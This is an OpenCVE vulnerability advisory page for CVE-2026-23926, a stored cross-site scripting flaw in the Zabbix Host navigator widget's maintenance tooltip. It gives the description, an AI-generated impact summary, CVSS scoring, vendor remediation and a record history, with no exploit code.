Description
An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user that opens tooltip for that maintenance period in the Host navigator widget. This can allow the attacker to perform unauthorized actions depending on which user opens the tooltip.
Published: 2026-05-06
Score: 7.3 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An authenticated administrator with non‑super user privileges can create a maintenance period containing JavaScript that runs whenever any user opens the tooltip for that maintenance period in the Host navigator widget. This stored XSS flaw (CWE‑79) allows the attacker to execute arbitrary script within the context of any user viewing the tooltip, potentially enabling unauthorized actions such as data exfiltration or local privilege escalation.

Affected Systems

Zabbix systems that include the Host navigator widget feature are affected. No specific version is listed in the CVE data, so all current installations that expose this widget are potentially impacted and should be verified against the latest vendor patch.

Risk and Exploitability

With a CVSS score of 7.3, the severity is high. The exploit is possible only after an authenticated non‑super administrator creates the malicious maintenance entry and then another user opens the tooltip, limiting the attack surface but still posing a significant risk. The EPSS score is not available and the vulnerability is not listed in the CISA KEV catalog, indicating no confirmed exploitation yet, but the potential remains. Patch the affected components or disable the widget to mitigate.

Generated by OpenCVE AI on May 6, 2026 at 08:21 UTC.

Remediation

Vendor Solution

Update the affected components to their respective fixed versions.

Vendor Workaround

Disable the Host navigator widget via Administration -> General -> Modules.

OpenCVE Recommended Actions

  • Apply the vendor‑supplied patch to the Zabbix Host navigator widget component.
  • Disable the Host navigator widget via Administration → General → Modules if a patch cannot be applied immediately.
  • Restrict or audit maintenance period creation by non‑super administrators to prevent malicious tooltip content until the patch is applied.

Generated by OpenCVE AI on May 6, 2026 at 08:21 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 06 May 2026 09:15:00 +0000

Type Values Removed Values Added
First Time appeared Zabbix
Zabbix zabbix
Vendors & Products Zabbix
Zabbix zabbix

Wed, 06 May 2026 07:30:00 +0000

Type Values Removed Values Added
Description An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user that opens tooltip for that maintenance period in the Host navigator widget. This can allow the attacker to perform unauthorized actions depending on which user opens the tooltip.
Title Stored XSS vulnerability in Host navigator widget maintenance tooltip
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 7.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: Zabbix

Published:

Updated: 2026-05-06T06:58:51.362Z

Reserved: 2026-01-19T14:02:54.327Z

Link: CVE-2026-23926

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-05-06T08:16:01.837

Modified: 2026-05-06T08:16:01.837

Link: CVE-2026-23926

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-06T09:00:09Z

Weaknesses